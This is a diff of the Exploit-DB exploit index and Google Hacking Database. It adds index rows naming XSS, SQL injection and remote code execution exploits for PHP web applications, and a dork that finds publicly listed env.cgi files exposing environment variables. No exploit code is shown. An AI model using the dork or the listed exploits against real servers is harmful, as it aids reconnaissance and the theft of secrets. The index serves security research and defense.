 49391,exploits/php/webapps/49391.txt,"Curfew e-Pass Management System 1.0 - Stored XSS",2021-01-07,"Arnav Tripathy",webapps,php,,2021-01-07,2021-01-07,0,,,,,,
 45719,exploits/php/webapps/45719.txt,"Curriculum Evaluation System 1.0 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80,2018-10-29,2018-10-29,0,CVE-2018-18803,"SQL Injection (SQLi)",,,http://www.exploit-db.comcurriculumevaluationsystem_0.zip,
 34825,exploits/php/webapps/34825.html,"Curverider Elgg 1.0 - Templates HTML Injection",2009-06-22,lorddemon,webapps,php,,2009-06-22,2014-09-30,1,,,,,,https://www.securityfocus.com/bid/43871/info
@ -19387,6 +19391,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48940,exploits/php/webapps/48940.txt,"Gym Management System 1.0 - Authentication Bypass",2020-10-23,"Jyotsna Adhana",webapps,php,,2020-10-23,2020-10-23,0,,,,,,
 48941,exploits/php/webapps/48941.txt,"Gym Management System 1.0 - Stored Cross Site Scripting",2020-10-23,"Jyotsna Adhana",webapps,php,,2020-10-23,2020-10-23,0,,,,,,
 48506,exploits/php/webapps/48506.py,"Gym Management System 1.0 - Unauthenticated Remote Code Execution",2020-05-22,boku,webapps,php,,2020-05-22,2020-05-22,0,,,,,,
 51777,exploits/php/webapps/51777.txt,"GYM MS - GYM Management System - Cross Site Scripting (Stored)",2024-02-05,yozgatalperen1,webapps,php,,2024-02-05,2024-02-05,0,,,,,,
 9640,exploits/php/webapps/9640.txt,"gyro 5.0 - SQL Injection / Cross-Site Scripting",2009-09-11,OoN_Boy,webapps,php,,2009-09-10,,1,OSVDB-58360;CVE-2009-3349;OSVDB-58359;CVE-2009-3348,,,,,
 51559,exploits/php/webapps/51559.txt,"GZ Forum Script 1.8 - Stored Cross-Site Scripting (XSS)",2023-07-03,CraCkEr,webapps,php,,2023-07-03,2023-07-03,0,,,,,,
 32541,exploits/php/webapps/32541.txt,"H&H Solutions WebSoccer 2.80 - 'id' SQL Injection",2008-10-28,d3v1l,webapps,php,,2008-10-28,2014-03-26,1,CVE-2008-5064;OSVDB-49439,,,,,https://www.securityfocus.com/bid/31963/info
@ -23457,6 +23462,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 26901,exploits/php/webapps/26901.txt,"Miraserver 1.0 RC4 - 'newsitem.php?id' SQL Injection",2005-12-19,r0t,webapps,php,,2005-12-19,2013-07-17,1,CVE-2005-4408;OSVDB-21837,,,,,https://www.securityfocus.com/bid/15960/info
 37633,exploits/php/webapps/37633.txt,"mIRC - 'projects.php' Cross-Site Scripting",2012-08-10,TayfunBasoglu,webapps,php,,2012-08-10,2015-07-18,1,,,,,,https://www.securityfocus.com/bid/54989/info
 30751,exploits/php/webapps/30751.html,"Miro Broadcast Machine 0.9.9 - 'login.php' Cross-Site Scripting",2007-11-12,"Hanno Boeck",webapps,php,,2007-11-12,2014-01-06,1,CVE-2007-3694;OSVDB-39735,,,,,https://www.securityfocus.com/bid/26407/info
 51780,exploits/php/webapps/51780.txt,"MISP 2.4.171 - Stored XSS",2024-02-05,"Mücahit Çeri",webapps,php,,2024-02-05,2024-02-05,0,,,,,,
 46401,exploits/php/webapps/46401.py,"MISP 2.4.97 - SQL Command Execution via Command Injection in STIX Module",2019-02-18,Tm9jdGlz,webapps,php,80,2019-02-18,2019-02-18,0,CVE-2018-19908,"Code Injection",,,http://www.exploit-db.comMISP-2.4.97.tar.gz,
 5214,exploits/php/webapps/5214.txt,"Mitra Informatika Solusindo cart - SQL Injection",2008-03-04,bius,webapps,php,,2008-03-03,,1,,,,,,
 47234,exploits/php/webapps/47234.py,"Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated Configuration Download",2019-08-12,xerubus,webapps,php,80,2019-08-12,2019-08-14,0,CVE-2019-14927,,,,,
@ -30525,6 +30531,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 35338,exploits/php/webapps/35338.txt,"TaskFreak! 0.6.4 - 'rss.php' HTTP Referer Header Cross-Site Scripting",2011-02-12,LiquidWorm,webapps,php,,2011-02-12,2016-10-27,1,CVE-2011-1062;OSVDB-70932,,,,http://www.exploit-db.comtaskfreak-multi-mysql-0.6.4.tgz,https://www.securityfocus.com/bid/46350/info
 16158,exploits/php/webapps/16158.txt,"TaskFreak! 0.6.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,webapps,php,,2011-02-12,2011-02-12,0,CVE-2011-1062;OSVDB-70932;OSVDB-70878;OSVDB-70877,,,,http://www.exploit-db.comtaskfreak-multi-mysql-0.6.4.tgz,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4990
 51692,exploits/php/webapps/51692.txt,"Taskhub CRM Tool 2.8.6 - SQL Injection",2023-08-21,"Ahmet Ümit BAYRAM",webapps,php,,2023-08-21,2023-08-21,0,,,,,,
 51782,exploits/php/webapps/51782.txt,"TASKHUB-2.8.8 - XSS-Reflected",2024-02-05,nu11secur1ty,webapps,php,,2024-02-05,2024-02-05,0,,,,,,
 15269,exploits/php/webapps/15269.txt,"Tastydir 1.2 (1216) - Multiple Vulnerabilities",2010-10-17,R,webapps,php,,2010-10-17,2015-04-17,0,,,,,,
 34809,exploits/php/webapps/34809.txt,"Tausch Ticket Script 3 - 'suchauftraege_user.php?userid' SQL Injection",2009-07-07,Moudi,webapps,php,,2009-07-07,2014-09-29,1,CVE-2009-2428;OSVDB-55691,,,,,https://www.securityfocus.com/bid/43710/info
 34810,exploits/php/webapps/34810.txt,"Tausch Ticket Script 3 - 'vote.php?descr' SQL Injection",2009-07-07,Moudi,webapps,php,,2009-07-07,2014-09-29,1,CVE-2009-2428;OSVDB-55692,,,,,https://www.securityfocus.com/bid/43710/info
@ -32575,6 +32582,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 44433,exploits/php/webapps/44433.txt,"WooCommerce CSV-Importer-Plugin 3.3.6 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,,2018-04-09,2018-04-09,0,,,,,,
 51156,exploits/php/webapps/51156.txt,"WooCommerce v7.1.0 - Remote Code Execution(RCE)",2023-03-31,"Milad karimi",webapps,php,,2023-03-31,2023-03-31,0,,,,,,
 12576,exploits/php/webapps/12576.txt,"Woodall Creative - SQL Injection",2010-05-11,XroGuE,webapps,php,,2010-05-10,,1,,,,,,
 51783,exploits/php/webapps/51783.txt,"Wordpress 'simple urls' Plugin < 115 - XSS",2024-02-05,AmirZargham,webapps,php,,2024-02-05,2024-02-05,0,,,,,,
 50456,exploits/php/webapps/50456.js,"Wordpress 4.9.6 - Arbitrary File Deletion (Authenticated) (2)",2021-10-25,samguy,webapps,php,,2021-10-25,2021-10-25,1,,,,,,
 49512,exploits/php/webapps/49512.py,"WordPress 5.0.0 - Image Remote Code Execution",2021-02-01,"OUSSAMA RAHALI",webapps,php,,2021-02-01,2021-02-01,0,CVE-2019-89242,,,,,
 50304,exploits/php/webapps/50304.sh,"WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated)",2021-09-20,"David Utón",webapps,php,,2021-09-20,2021-09-20,0,CVE-2021-29447,,,,,
--- a/ghdb.xml
+++ b/ghdb.xml
@ -32898,7 +32898,7 @@ Google Dork: &quot;Started by upstream project&quot; ext:txt</textualDescription
  <querystring>https://www.google.com/search?q=&quot;Started by upstream project&quot; ext:txt</querystring>
  <edb></edb>
  <date>2024-02-02</date>
-  <author>nadirb19</author>
+  <author>Nadir Boulacheb (RubX)</author>
 </entry>
 <entry>
  <id>4162</id>
@ -47638,6 +47638,21 @@ Bruno Schmid
  <date>2023-11-02</date>
  <author>Esteban Brenes Segura</author>
 </entry>
 <entry>
  <id>8404</id>
  <link>https://www.exploit-db.com/ghdb/8404</link>
  <category>Files Containing Juicy Info</category>
  <shortDescription>intitle:&quot;index of&quot; env.cgi</shortDescription>
  <textualDescription>Simple Dork that displays the env file which contains env
 variables, usually juicy stuff and a lot of information disclosure.
 *intitle:&quot;index of&quot; env.cgi*</textualDescription>
  <query>intitle:&quot;index of&quot; env.cgi</query>
  <querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; env.cgi</querystring>
  <edb></edb>
  <date>2024-02-05</date>
  <author>Wallehazz</author>
 </entry>
 <entry>
  <id>5917</id>
  <link>https://www.exploit-db.com/ghdb/5917</link>
@ -116857,7 +116872,7 @@ Dork: intitle:&quot;Installation Wizard - PowerCMS v2&quot;</textualDescription>
  <querystring>https://www.google.com/search?q=intitle:&quot;Installation Wizard - PowerCMS v2&quot;</querystring>
  <edb></edb>
  <date>2024-02-02</date>
-  <author>nadirb19</author>
+  <author>Nadir Boulacheb (RubX)</author>
 </entry>
 <entry>
  <id>753</id>
@ -116992,7 +117007,7 @@ Dork: intitle:&quot;Welcome to iTop version&quot; wizard
  <querystring>https://www.google.com/search?q=intitle:&quot;Welcome to iTop version&quot; wizard</querystring>
  <edb></edb>
  <date>2024-02-02</date>
-  <author>nadirb19</author>
+  <author>Nadir Boulacheb (RubX)</author>
 </entry>
 <entry>
  <id>6419</id>